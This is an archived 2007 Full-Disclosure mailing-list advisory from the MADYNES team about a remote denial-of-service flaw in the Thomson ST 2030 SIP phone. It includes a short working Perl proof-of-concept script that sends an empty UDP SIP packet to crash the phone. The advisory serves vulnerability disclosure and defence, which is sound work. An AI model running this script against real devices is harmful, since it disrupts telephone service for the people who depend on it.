Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030 using an empty packet |
|---|---|
| Date: | Tue, 28 Aug 2007 15:05:06 +0200 |
MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030 using an empty packet Date of Discovery 15 February, 2007 Vendor was notified on 1 March 2007 ID: KIPH10 Synopsis After sending an empty message the device looks functional but in fact does not respond to any event provoking a DoS Background SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP signalization. SIP is an ASCII based INVITE message is used to initiate and maintain a communication session. Affected devices: Thomson SIP phone ST 2030 Impact : A malicious user can remotely crash and perform a denial of service attack by sending one crafted void SIP message. Resolution Fixed software will be available from the vendor and customers following recommended best practices (ie segregating VOIP traffic from data) will be protected from malicious traffic in most situations. Credits Humberto J. Abdelnur (Ph.D Student) Radu State (Ph.D) Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see http://hal.inria.fr/inria-00166947/en), Configuration of our device: Software Version: v1.52.1 IP-Address obtained by DHCP as 192.168.1.106 User name : thomson To run the exploit the file thomson-2030-pl should be launched (assuming our configurations) as: POC Code: perl thomson-2030.pl 192.168.1.106 5060 thomson #!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = ""; $socket->send($msg);
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [Full-disclosure] .R4L - Multiple vulnerabilities in Clam AV 0.91.2, Just1n T1mberlake |
|---|---|
| Next by Date: | [Full-disclosure] [SECURITY] [DSA 1359-1] New dovecot packages fix directory traversal, Steve Kemp |
| Previous by Thread: | [Full-disclosure] .R4L - Multiple vulnerabilities in Clam AV 0.91.2, Just1n T1mberlake |
| Next by Thread: | [Full-disclosure] [SECURITY] [DSA 1359-1] New dovecot packages fix directory traversal, Steve Kemp |
| Indexes: | [Date] [Thread] [Top] [All Lists] |